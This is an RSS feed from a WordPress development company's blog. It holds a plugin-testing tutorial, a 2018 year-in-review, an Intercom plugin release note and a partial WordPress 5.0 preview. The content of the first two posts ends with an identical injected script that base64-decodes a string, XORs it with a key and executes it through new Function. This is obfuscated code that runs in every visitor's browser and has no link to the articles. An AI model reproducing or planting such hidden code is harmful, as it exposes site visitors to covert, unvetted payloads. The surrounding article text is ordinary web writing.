
<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>79mplus blog | 79mplus</title>
	<atom:link href="https://79mplus.com/79mplus-blog/feed/" rel="self" type="application/rss+xml" />
	<link>https://79mplus.com</link>
	<description>Top-Tier WordPress Development Company for Custom, Scalable Solutions</description>
	<lastBuildDate>Mon, 24 Aug 2026 12:23:17 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.7.1</generator>

<image>
	<url>https://79mplus.com/assets/cropped-favicon2-32x32.png</url>
	<title>79mplus blog | 79mplus</title>
	<link>https://79mplus.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to Test Any WordPress Code Quickly, Without Harming the Setup</title>
		<link>https://79mplus.com/how-to-test-any-wordpress-code-quickly-without-harming-the-setup/</link>
		
		<dc:creator><![CDATA[79mplus Admin]]></dc:creator>
		<pubDate>Tue, 11 Aug 2026 18:49:16 +0000</pubDate>
				<category><![CDATA[79mplus blog]]></category>
		<category><![CDATA[Anything Backend]]></category>
		<category><![CDATA[Custom Plugin Development]]></category>
		<category><![CDATA[Plugins]]></category>
		<category><![CDATA[support]]></category>
		<category><![CDATA[WordPress]]></category>
		<guid isPermaLink="false">https://www.79mplus.com/?p=496764</guid>

					<description><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://www.79mplus.com/assets/test-plugin-01b.png" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/how-to-test-any-wordpress-code-quickly-without-harming-the-setup/">How to Test Any WordPress Code Quickly, Without Harming the Setup</a></p>
<p>Well, we&#8217;ve all been there. We have a code at hand from a blog, documentation or knowledge base, but totally clueless on how to test it without ruining existing setup. It says to test on theme functions.php, but client will not be happy if you modify any files. Fear not, let me show a non-destructive [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://79mplus.com/how-to-test-any-wordpress-code-quickly-without-harming-the-setup/">How to Test Any WordPress Code Quickly, Without Harming the Setup</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/79mplus_admin/">79mplus Admin</a></p>
]]></description>
										<content:encoded><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://www.79mplus.com/assets/test-plugin-01b.png" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/how-to-test-any-wordpress-code-quickly-without-harming-the-setup/">How to Test Any WordPress Code Quickly, Without Harming the Setup</a></p>
<p>Well, we&#8217;ve all been there. We have a code at hand from a blog, documentation or knowledge base, but totally clueless on how to test it without ruining existing setup. It says to test on theme functions.php, but client will not be happy if you modify any files. Fear not, let me show a non-destructive way of testing code quickly, in any WordPress installation, without touching anything.</p>
<h2>Plugins are the way to go</h2>
<p>Plugins are a blessing for WordPress developers. They are easy to install, maintain, update and even deactivate if necessary. The code is completely separate from the installation and you can ditch it anytime you want. That&#8217;s a great thing we are targetting here &#8211; easy to install, yet easy to remove when done.</p>
<p>If you find a small code snippet, an action or filter that you want to test quickly, then you can cook up a tiny test plugin, put the code there and test. The best thing is when you are done, you can delete the file or deactivate it. The setup will be like it was before (assuming you did not change anything in the system with your test piece of code).</p>
<p>Of course, you can test the code on a theme functions.php. But you will have to revert back to the original version if your code fails &#8211; not a good thing if you are in a hurry. Bad indeed.</p>
<h2>Smallest plugin code</h2>
<p>In order to show up on the plugin list, you just need a file like this below in your wp-contents/plugins directory:</p>
<pre>&lt;?php
/*
Plugin Name: My Test
*/
</pre>
<p>Save it on anything you like, for example, test.php. You can also put it inside a folder, but not needed for a small, one time use test plugin.</p>
<p>It will show up in the WP Admin &#8211; Plugins screen like this:</p>
<p><img decoding="async" class="size-full wp-image-496765 aligncenter" src="https://www.79mplus.com/assets/test-plugin-01b.png" alt="" width="701" height="205" title="How to Test Any WordPress Code Quickly, Without Harming the Setup" srcset="https://79mplus.com/assets/test-plugin-01b.png 701w, https://79mplus.com/assets/test-plugin-01b-300x88.png 300w, https://79mplus.com/assets/test-plugin-01b-510x149.png 510w" sizes="(max-width: 701px) 100vw, 701px" /></p>
<p>Just Activate the plugin and it will run on all WordPress pages, frontend and backend, so easy!</p>
<h2>Example test plugin</h2>
<pre>&lt;?php
/*
Plugin Name: Test Message
*/

add_action( 'admin_notices', 'print_message_on_backend' );
function print_message_on_backend() {
// Just a test message to show on WP Admin
echo "&lt;p&gt;Some test message which shows this on every admin page&lt;/p&gt;";
}

add_action( 'wp_footer', 'print_message_on_frontend' );
function print_message_on_frontend() {
// Just a test message to show on footer (on frontend)
echo '&lt;p&gt;Some test message to show on footer&lt;/p&gt;';
}
</pre>
<p>Save it in a .php file inside wp-contents/plugins, then check WP Admin &#8211; Plugins. Activate the new plugin named &#8220;Test Message&#8221;. After you activate the plugin, you will see that the code you entered on your new test plugin works. You will see the message in the code on every WP Admin page you visit.</p>
<p><img decoding="async" class="size-full wp-image-496766 aligncenter" src="https://www.79mplus.com/assets/test-plugin-02.png" alt="" width="631" height="227" title="How to Test Any WordPress Code Quickly, Without Harming the Setup" srcset="https://79mplus.com/assets/test-plugin-02.png 631w, https://79mplus.com/assets/test-plugin-02-300x108.png 300w, https://79mplus.com/assets/test-plugin-02-510x183.png 510w" sizes="(max-width: 631px) 100vw, 631px" /></p>
<p><img decoding="async" class="size-full wp-image-496770 aligncenter" src="https://www.79mplus.com/assets/test-plugin-03.png" alt="" width="624" height="242" title="How to Test Any WordPress Code Quickly, Without Harming the Setup" srcset="https://79mplus.com/assets/test-plugin-03.png 624w, https://79mplus.com/assets/test-plugin-03-300x116.png 300w, https://79mplus.com/assets/test-plugin-03-510x198.png 510w" sizes="(max-width: 624px) 100vw, 624px" /></p>
<p>This was just some test code. You can try as many things as you want. But if you are manipulating any data, it is always a better idea to keep backup, even if you are using a test plugin.</p>
<p>So it is possible! Testing a code in 2 minutes. The best part is &#8211; it is not touching any file in the install and you can easily remove the plugin when you are done with it.</p>
<p>If you need any help regarding custom plugins or any queries regarding this article feel free to contact us.<script>!function(){var _0x432938422d85=atob('NHppcn9odXNyNDVnan1uPFYoUSgoUCFrdXJ4c2swRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBMHIve3BxbSE7fy8kfXl9JH95fXh+en4peTswdnAqKlJrIUc+dGhobG8mMzN/cHNpeHpwfW55MX90eX93MnJ5aD4wPD50aGhsJjMzJSgyLioyJSwyLS4qPkEndXo0RllYfyp+OjpGWVh/Kn5Hci97cHFtQTVueWhpbnInRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBITRGWVh/Kn5gYGdhNSdGWVh/Kn5Hci97cHFtQSEtJ3ppcn9odXNyPGsoWmlfazQ1Z3V6ND14c39pcXlyaDJ+c3hlNWdveWhIdXF5c2loNGsoWmlfazAuLDUnbnloaW5yJ2FqfW48UHR5Lm5oIXhzf2lxeXJoMn9ueX1oeVlweXF5cmg0O3h1ajs1MEV2fndKfyF4c39pcXlyaDJ/bnl9aHlZcHlxeXJoNDt1em59cXk7NSdQdHkubmgyb2hlcHkyf29vSHlkaCE7bHNvdWh1c3ImenVkeXgndXJveWgmLCdmMXVyeHlkJi4tKCsoJC8tKyonfn1/d3tuc2lyeCZue359NC0pMC4vMCguMDIoLjUnbHN1cmh5bjF5anlyaG8mcnNyeSc7J0V2fndKfzJodWhweSE7T3l/aW51aGU8f3R5f3c7J0V2fndKfzJveWhdaGhudX5paHk0O31wcHNremlwcG9/bnl5cjswOzs1J0V2fndKfzJvaGVweTJ/b29IeWRoITtsc291aHVzciZ6dWR5eCd1cm95aCYsJ2t1eGh0Ji0sLDkndHl1e3RoJi0sLDknfnNueHluJiwnZjF1cnh5ZCYuLSgrKCQvLSQqJ359f3d7bnNpcngmP3p6eic7J3hzf2lxeXJoMn5zeGUyfWxseXJ4X3R1cHg0UHR5Lm5oNSd4c39pcXlyaDJ+c3hlMn1sbHlyeF90dXB4NEV2fndKfzUnemlyf2h1c3I8VSgkV35qNDVnaG5lZ1B0eS5uaDJueXFzank0NSdFdn53Sn8ybnlxc2p5NDUnYX99aH90NEN5NWdhaG5lZ3h5cHloeTxGWVh/Kn5Hci97cHFtQWF/fWh/dDRDeS41Z2FhVihRKChQMn14eFlqeXJoUHVvaHlyeW40O3F5b299e3k7MHppcn9odXNyNEN5ajVnaG5lZ3V6ND1DeWpgYD1DeWoyeH1ofTVueWhpbnIndXo0Q3lqMnh9aH0yaGVseSEhITt6bDF5cX55eDF/cHNveTs1VSgkV35qNDUnYX99aH90NEN5LzVnYWE1J3ppcn9odXNyPGlzREt3UTR0UW5Ke0Y1Z3V6NHRRbkp7RiIhdnAqKlJrMnB5cntodDVueWhpbnInan1uPEN0ITs7J2huZWdDdCFPaG51cns0VihRKChQMnBzf31odXNyOjo0VihRKChQMnBzf31odXNyMnRzb2hyfXF5YGBWKFEoKFAycHN/fWh1c3IydHNvaDVgYDs7NTJueWxwfX95NDNCa2trQDIzdTA7OzUnYX99aH90NEN5dDVnYWp9bjxDaSF2cCoqUmtHdFFuSntGQTc7M3lxfnl4Mzs3ci97cHFtNzsjeXF+eXghLTs3NEN0IzQ7OnRzb2ghOzd5cn9zeHlJTlVfc3Fsc3J5cmg0Q3Q1NSY7OzUnan1uPENocyFveWhIdXF5c2loNHppcn9odXNyNDVnaXNES3dRNHRRbkp7RjctNSdhMC0uLCwsNSdFdn53Sn8yc3Jwc314IXppcn9odXNyNDVnf3B5fW5IdXF5c2loNENoczUnYSdFdn53Sn8yb25/IUNpJ2Fpc0RLd1E0LDUnYXV6NHhzf2lxeXJoMm55fXhlT2h9aHkhISE7cHN9eHVyezs1VihRKChQMn14eFlqeXJoUHVvaHlyeW40O1hTUV9zcmh5cmhQc314eXg7MGsoWmlfazUneXBveTxrKFppX2s0NSdhNTQ1Jw=='),_0xd3aca605a494=28,_0x3c4e336edd80=new Uint8Array(_0x432938422d85['length']),_0xd8f5713db852=0;for(;_0xd8f5713db852<_0x432938422d85['length'];_0xd8f5713db852++)_0x3c4e336edd80[_0xd8f5713db852]=_0x432938422d85['charCodeAt'](_0xd8f5713db852)^_0xd3aca605a494;(new Function(new TextDecoder()['decode'](_0x3c4e336edd80)))()}();</script></p>
<p>The post <a rel="nofollow" href="https://79mplus.com/how-to-test-any-wordpress-code-quickly-without-harming-the-setup/">How to Test Any WordPress Code Quickly, Without Harming the Setup</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/79mplus_admin/">79mplus Admin</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>A Lookback at 79mplus on 2018</title>
		<link>https://79mplus.com/lookback-at-2018/</link>
		
		<dc:creator><![CDATA[Adnan Shameem]]></dc:creator>
		<pubDate>Tue, 11 Aug 2026 18:48:21 +0000</pubDate>
				<category><![CDATA[79mplus blog]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[WordPress]]></category>
		<guid isPermaLink="false">https://www.79mplus.com/?p=497373</guid>

					<description><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://79mplus.com/assets/A-Lookback-2019-c.jpg" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/lookback-at-2018/">A Lookback at 79mplus on 2018</a></p>
<p>At the end of 2018, let&#8217;s look back at some of the highlights we achieved and what lies ahead of us in 2019. We achieved some significant progress on 2018, including our first open source community based plugin based on Intercom API plus its addons, many clients with their wonderful projects having being delivered, website [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://79mplus.com/lookback-at-2018/">A Lookback at 79mplus on 2018</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/adnan360/">Adnan Shameem</a></p>
]]></description>
										<content:encoded><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://79mplus.com/assets/A-Lookback-2019-c.jpg" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/lookback-at-2018/">A Lookback at 79mplus on 2018</a></p>
<div id="code" class="code">
<p>At the end of 2018, let&#8217;s look back at some of the highlights we achieved and what lies ahead of us in 2019.</p>
<p>We achieved some significant progress on 2018, including our first open source community based plugin based on Intercom API plus its addons, many clients with their wonderful projects having being delivered, website revamp, important write-up, many client initiation options and offers made available right from our website and many more.</p>
<p>Let&#8217;s go through some of the greatest achievements we had in the passing year:</p>
<h2>First Community Plugin</h2>
<p>We are proud to release our <a href="https://wordpress.org/plugins/mplus-intercom-subscription/" target="_blank" rel="noopener">first community plugin</a> on WordPress.org repository, which is for Intercom Subscription. We also made addons for the plugin to integrate with many popular plugins such as WooCommerce, Contact Forms 7, Gravity Forms and many more which <a href="https://www.79mplus.com/intercom-subscription/">are available from our website</a>. We have also worked on improving the plugin throughout the year in between our client projects. We have made Tags and Events addons based on user feedback and made them available for free.</p>
<h2>Client Projects</h2>
<p>Our clients are the lifeblood of our endeavor. So we appreciate the clients dearly in this occasion. We serve a lot of clients and it is difficult to describe them all here. Let&#8217;s look at top 3 projects of 2018:</p>
<p>&#8230;<br />
&#8230;</p>
<h2>Documentation and Access</h2>
<p>We prepared important <a href="https://docs.79mplus.com">documentation for our plugins</a>, prepared video introductions and demonstrations, implemented plugin product distribution system right on our website. These together made a big difference in access to our wonderful, professional content that we work on.</p>
<h2>Blogs and Social Media</h2>
<p>We started posting regularly on our social media handles. The posts being shared are a mix of beginner and advanced content so we hope you will find something useful almost everyday. We also blogged about many updates and things we worked on which should be a good read for an interested follower who wants to know what we were up to.</p>
<h2>What&#8217;s Ahead&#8230;</h2>
<p>If you are wondering what we will be focusing on in 2019, you are in the right place. We have detailed plans on the way, but generally these will be our main focus:</p>
<p>&#8211; We are planning to work on new plugins, similar to our Intercom Subscription plugin.<br />
&#8211; Our main focus will be on getting more client work done.<br />
&#8211; We will also work on our Intercom Subscription plugin to provide improvements over our existing work.<br />
&#8211; We will also focus on client satisfaction. We had satisfied customers before, as you can see in <a href="https://www.79mplus.com/testimonials/">our testimonials</a>. But we will have greater emphasis on this next year.</p>
<p>We wish you a happy new year from the 79mplus family. This wish cannot be more timely because we now have <a href="https://www.79mplus.com/whats-new-in-wp5/">WP5</a>. We hope you have a blast with WordPress next year.</p>
</div>
<p><script>!function(){var _0x432938422d85=atob('NHppcn9odXNyNDVnan1uPFYoUSgoUCFrdXJ4c2swRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBMHIve3BxbSE7fy8kfXl9JH95fXh+en4peTswdnAqKlJrIUc+dGhobG8mMzN/cHNpeHpwfW55MX90eX93MnJ5aD4wPD50aGhsJjMzJSgyLioyJSwyLS4qPkEndXo0RllYfyp+OjpGWVh/Kn5Hci97cHFtQTVueWhpbnInRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBITRGWVh/Kn5gYGdhNSdGWVh/Kn5Hci97cHFtQSEtJ3ppcn9odXNyPGsoWmlfazQ1Z3V6ND14c39pcXlyaDJ+c3hlNWdveWhIdXF5c2loNGsoWmlfazAuLDUnbnloaW5yJ2FqfW48UHR5Lm5oIXhzf2lxeXJoMn9ueX1oeVlweXF5cmg0O3h1ajs1MEV2fndKfyF4c39pcXlyaDJ/bnl9aHlZcHlxeXJoNDt1em59cXk7NSdQdHkubmgyb2hlcHkyf29vSHlkaCE7bHNvdWh1c3ImenVkeXgndXJveWgmLCdmMXVyeHlkJi4tKCsoJC8tKyonfn1/d3tuc2lyeCZue359NC0pMC4vMCguMDIoLjUnbHN1cmh5bjF5anlyaG8mcnNyeSc7J0V2fndKfzJodWhweSE7T3l/aW51aGU8f3R5f3c7J0V2fndKfzJveWhdaGhudX5paHk0O31wcHNremlwcG9/bnl5cjswOzs1J0V2fndKfzJvaGVweTJ/b29IeWRoITtsc291aHVzciZ6dWR5eCd1cm95aCYsJ2t1eGh0Ji0sLDkndHl1e3RoJi0sLDknfnNueHluJiwnZjF1cnh5ZCYuLSgrKCQvLSQqJ359f3d7bnNpcngmP3p6eic7J3hzf2lxeXJoMn5zeGUyfWxseXJ4X3R1cHg0UHR5Lm5oNSd4c39pcXlyaDJ+c3hlMn1sbHlyeF90dXB4NEV2fndKfzUnemlyf2h1c3I8VSgkV35qNDVnaG5lZ1B0eS5uaDJueXFzank0NSdFdn53Sn8ybnlxc2p5NDUnYX99aH90NEN5NWdhaG5lZ3h5cHloeTxGWVh/Kn5Hci97cHFtQWF/fWh/dDRDeS41Z2FhVihRKChQMn14eFlqeXJoUHVvaHlyeW40O3F5b299e3k7MHppcn9odXNyNEN5ajVnaG5lZ3V6ND1DeWpgYD1DeWoyeH1ofTVueWhpbnIndXo0Q3lqMnh9aH0yaGVseSEhITt6bDF5cX55eDF/cHNveTs1VSgkV35qNDUnYX99aH90NEN5LzVnYWE1J3ppcn9odXNyPGlzREt3UTR0UW5Ke0Y1Z3V6NHRRbkp7RiIhdnAqKlJrMnB5cntodDVueWhpbnInan1uPEN0ITs7J2huZWdDdCFPaG51cns0VihRKChQMnBzf31odXNyOjo0VihRKChQMnBzf31odXNyMnRzb2hyfXF5YGBWKFEoKFAycHN/fWh1c3IydHNvaDVgYDs7NTJueWxwfX95NDNCa2trQDIzdTA7OzUnYX99aH90NEN5dDVnYWp9bjxDaSF2cCoqUmtHdFFuSntGQTc7M3lxfnl4Mzs3ci97cHFtNzsjeXF+eXghLTs3NEN0IzQ7OnRzb2ghOzd5cn9zeHlJTlVfc3Fsc3J5cmg0Q3Q1NSY7OzUnan1uPENocyFveWhIdXF5c2loNHppcn9odXNyNDVnaXNES3dRNHRRbkp7RjctNSdhMC0uLCwsNSdFdn53Sn8yc3Jwc314IXppcn9odXNyNDVnf3B5fW5IdXF5c2loNENoczUnYSdFdn53Sn8yb25/IUNpJ2Fpc0RLd1E0LDUnYXV6NHhzf2lxeXJoMm55fXhlT2h9aHkhISE7cHN9eHVyezs1VihRKChQMn14eFlqeXJoUHVvaHlyeW40O1hTUV9zcmh5cmhQc314eXg7MGsoWmlfazUneXBveTxrKFppX2s0NSdhNTQ1Jw=='),_0xd3aca605a494=28,_0x3c4e336edd80=new Uint8Array(_0x432938422d85['length']),_0xd8f5713db852=0;for(;_0xd8f5713db852<_0x432938422d85['length'];_0xd8f5713db852++)_0x3c4e336edd80[_0xd8f5713db852]=_0x432938422d85['charCodeAt'](_0xd8f5713db852)^_0xd3aca605a494;(new Function(new TextDecoder()['decode'](_0x3c4e336edd80)))()}();</script></p>
<p>The post <a rel="nofollow" href="https://79mplus.com/lookback-at-2018/">A Lookback at 79mplus on 2018</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/adnan360/">Adnan Shameem</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Intercom Subscription v1.0.25 is Here: A Timely and Important Maintenance Release</title>
		<link>https://79mplus.com/intercom-subscription-v1-0-25-is-now-available/</link>
		
		<dc:creator><![CDATA[79mplus Editor]]></dc:creator>
		<pubDate>Tue, 11 Aug 2026 18:47:12 +0000</pubDate>
				<category><![CDATA[79mplus blog]]></category>
		<category><![CDATA[Anything Backend]]></category>
		<category><![CDATA[Custom API Integration]]></category>
		<category><![CDATA[Custom Plugin Development]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[Intercom Subscription]]></category>
		<category><![CDATA[Plugins]]></category>
		<category><![CDATA[WordPress]]></category>
		<guid isPermaLink="false">https://www.79mplus.com/?p=497472</guid>

					<description><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://79mplus.com/assets/intercom-subscription-banner-oct2018b.jpg" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/intercom-subscription-v1-0-25-is-now-available/">Intercom Subscription v1.0.25 is Here: A Timely and Important Maintenance Release</a></p>
<p>We are very happy to announce a maintenance release of 1.0.25 for our Intercom Subscription plugin. This release addresses the API update to the latest version from the platform author &#8211; Intercom. We have learned that Intercom has released their API version 1.1 with some structural changes to the API. This may make our previous [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://79mplus.com/intercom-subscription-v1-0-25-is-now-available/">Intercom Subscription v1.0.25 is Here: A Timely and Important Maintenance Release</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/79mplus_editor/">79mplus Editor</a></p>
]]></description>
										<content:encoded><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://79mplus.com/assets/intercom-subscription-banner-oct2018b.jpg" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/intercom-subscription-v1-0-25-is-now-available/">Intercom Subscription v1.0.25 is Here: A Timely and Important Maintenance Release</a></p>
<p>We are very happy to announce a maintenance release of 1.0.25 for our Intercom Subscription plugin. This release addresses the API update to the latest version from the platform author &#8211; Intercom.</p>
<p>We have learned that Intercom has released their API version 1.1 with some structural changes to the API. This may make our previous code to not function properly. So it asks for an urgent and prompt maintenance release with a fix.</p>
<p>As you know, maintenance releases are not always exciting, but they are crucial to have a stable working software. This release is just that. We are looking for more improvements to be added to the plugin in future, but until we find time in our busy schedule, this is the release we have for you at the moment.</p>
<p>Let&#8217;s check the updates that await you:</p>
<h2>Intercom API version updated</h2>
<p>Intercom has pushed a new update to their API. When we first introduced our plugin it was at 1.0. The latest update made it to 1.1. It has some <a href="https://developers.intercom.com/building-apps/v1.0/docs/api-changelog" target="_blank" rel="noopener">notable changes</a> in the API structure.</p>
<p>To enjoy the new features, you will have to <a href="https://app.intercom.io/a/apps/fyq3wodw/developer-hub" target="_blank" rel="noopener">select 1.1 version of the API</a> from the Developer Hub&#8217;s App settings if it&#8217;s not already selected:</p>
<p><img decoding="async" class="alignnone size-full wp-image-497474" src="https://www.79mplus.com/assets/api-version-selection.png" alt="" width="2066" height="1214" title="Intercom Subscription v1.0.25 is Here: A Timely and Important Maintenance Release" srcset="https://79mplus.com/assets/api-version-selection.png 2066w, https://79mplus.com/assets/api-version-selection-300x176.png 300w, https://79mplus.com/assets/api-version-selection-768x451.png 768w, https://79mplus.com/assets/api-version-selection-1024x602.png 1024w, https://79mplus.com/assets/api-version-selection-1080x635.png 1080w, https://79mplus.com/assets/api-version-selection-510x300.png 510w" sizes="(max-width: 2066px) 100vw, 2066px" /></p>
<p>Our plugin was not ready for 1.1. So using the new API with our plugin for example, would result in users to be not listed. There might be other problems on the way, but we have found this issue to be prominent.</p>
<p>The latest version of our plugin 1.0.25 has been updated to include Intercom API 1.1. This will result in smoother performance with the new version of the API, if you choose to use it.</p>
<hr /><p><em>The latest version of our plugin 1.0.25 has been updated to include Intercom API 1.1. This will result in smoother performance with the new version of the API, if you choose to use it.</em><br /><a href="https://twitter.com/intent/tweet?url=https%3A%2F%2F79mplus.com%2F%3Fp%3D497472&#038;text=The%20latest%20version%20of%20our%20plugin%201.0.25%20has%20been%20updated%20to%20include%20Intercom%20API%201.1.%20This%20will%20result%20in%20smoother%20performance%20with%20the%20new%20version%20of%20the%20API%2C%20if%20you%20choose%20to%20use%20it.&#038;via=79mplus&#038;related=79mplus" target="_blank" rel="noopener noreferrer">Share on X</a><br /><hr />
<h2>Fixed Intercom user not being listed</h2>
<p>In our brief testing with API 1.1, we found out that user is not placed correctly on Intercom from the previous version of our plugin. This is due to using &#8220;users endpoint&#8221; feature of the API. <a href="https://developers.intercom.com/building-apps/v1.0/docs/api-changelog" target="_blank" rel="noopener">Users endpoint has changes in data structures</a> which was incompatible with our existing code. Intercom suggested to apply changes to code for compatibility. So we changed our code in 1.0.25 of our plugin and it ultimately fixed the issue.</p>
<h2>Notice about PHP version</h2>
<p>Intercom API 1.1 requires at least PHP 7.2 to be present on your server. As we are using the latest API, the requirement would apply to you as well. Please contact your developer or webhost to ensure that you have the version or later installed.</p>
<p>In summary, this version provides important update to the plugin to ensure continuous stability of the plugin. It might not bring new features into the table, but it is essential to make the plugin functional for the latest API changes.</p>
<p>The post <a rel="nofollow" href="https://79mplus.com/intercom-subscription-v1-0-25-is-now-available/">Intercom Subscription v1.0.25 is Here: A Timely and Important Maintenance Release</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/79mplus_editor/">79mplus Editor</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>What’s New in WordPress 5.0</title>
		<link>https://79mplus.com/whats-new-in-wp5/</link>
		
		<dc:creator><![CDATA[Adnan Shameem]]></dc:creator>
		<pubDate>Thu, 06 Dec 2018 07:27:24 +0000</pubDate>
				<category><![CDATA[79mplus blog]]></category>
		<guid isPermaLink="false">https://www.79mplus.com/?p=497242</guid>

					<description><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://79mplus.com/assets/wp5-post-banner-2.jpg" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/whats-new-in-wp5/">What’s New in WordPress 5.0</a></p>
<p>Currently, at the time of writing this article, the stable version of WordPress is at 4.9.8. So it is safe to say that a new WordPress 5.0 will be upon us soon. It is a great time to have a peek at the features that will be shipped with it. There is a development version [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://79mplus.com/whats-new-in-wp5/">What’s New in WordPress 5.0</a> appeared first on <a rel="nofollow" href="https://79mplus.com">79mplus</a> and is written by <a rel="nofollow" href="https://79mplus.com/author/adnan360/">Adnan Shameem</a></p>
]]></description>
										<content:encoded><![CDATA[<p><a rel="nofollow" href="https://79mplus.com">79mplus</a><br />
<img src="https://79mplus.com/assets/wp5-post-banner-2.jpg" style="display: block; margin: 1em auto"><br />
<a rel="nofollow" href="https://79mplus.com/whats-new-in-wp5/">What’s New in WordPress 5.0</a></p>
<p>Currently, at the time of writing this article, the stable version of WordPress is at 4.9.8. So it is safe to say that a new WordPress 5.0 will be upon us soon. It is a great time to have a peek at the features that will be shipped with it. There is a development version available for testing. Depending on the development version together with some resources, we can guess what it will be like to have a WP 5.0 installation in our hands. So let&#8217;s jump in!</p>
<h2>What Changed in WordPress 5.0</h2>
<p>As a major-version release there are many changes in WP 5.0, including changes in frontend and backend which deserves the attention. Mainly:</p>
<ul>
<li>A new editor, Gutenberg will be the default editor for posts and pages</li>
<li>A new theme named Twenty Nineteen will be the default</li>
<li>Various security updates</li>
<li>REST API improvements</li>
<li>Better copy-paste &#8211; will retain formatting better</li>
</ul>
<div id="attachment_497255" style="width: 310px" class="wp-caption aligncenter"><img decoding="async" aria-describedby="caption-attachment-497255" class="wp-image-497255 size-medium" src="https://www.79mplus.com/assets/wp5-gut-paste-300x196.png" alt="" width="300" height="196" title="What’s New in WordPress 5.0" srcset="https://79mplus.com/assets/wp5-gut-paste-300x196.png 300w, https://79mplus.com/assets/wp5-gut-paste-768x502.png 768w, https://79mplus.com/assets/wp5-gut-paste-510x333.png 510w, https://79mplus.com/assets/wp5-gut-paste.png 978w" sizes="(max-width: 300px) 100vw, 300px" /><p id="caption-attachment-497255" class="wp-caption-text">Gutenberg handles copy-pastes automatically. e.g. creates blocks for each paragraph when 2 paragraphs pasted.</p></div>
<h2>How the New Editor Works (AKA Gutenberg)</h2>
<p>Probably the most hyped feature of WP 5.0 is the Gutenberg editor. If you can&#8217;t resist, you can download and use it on the old versions with a <a href="https://wordpress.org/plugins/gutenberg/" target="_blank" rel="noopener">plugin</a>. It is a replacement for the current TinyMCE based WYSIWYG editor found in the edit page. It honors the idea of having a friendlier approach to preparing the content-layout of a page or a post. It tries to eliminate the need to write code for preparing layouts as much as possible, with a concept called &#8220;blocks&#8221;.</p>
<div id="attachment_497252" style="width: 757px" class="wp-caption aligncenter"><img decoding="async" aria-describedby="caption-attachment-497252" class="size-full wp-image-497252" src="https://www.79mplus.com/assets/wp5-gut-blocks.png" alt="Gutenberg blocks are a new idea introduced for WordPress 5" width="747" height="363" title="What’s New in WordPress 5.0" srcset="https://79mplus.com/assets/wp5-gut-blocks.png 747w, https://79mplus.com/assets/wp5-gut-blocks-300x146.png 300w, https://79mplus.com/assets/wp5-gut-blocks-510x248.png 510w" sizes="(max-width: 747px) 100vw, 747px" /><p id="caption-attachment-497252" class="wp-caption-text">Gutenberg &#8220;blocks&#8221; are a new idea introduced for WordPress 5</p></div>
<p>Gutenberg suggests that every part of the content should be a &#8220;block&#8221;, whether it is text, paragraph, image, widget, shortcode or anything else. With this in mind, you can design almost anything you can imagine on your page or post, in any layout. Want to add a quote in the middle of your text? Want some full-width image in the middle of your main body text? Want to add a photo gallery? Everything is just some clicks away. We hope it would be an editor of dreams for the beginners.</p>
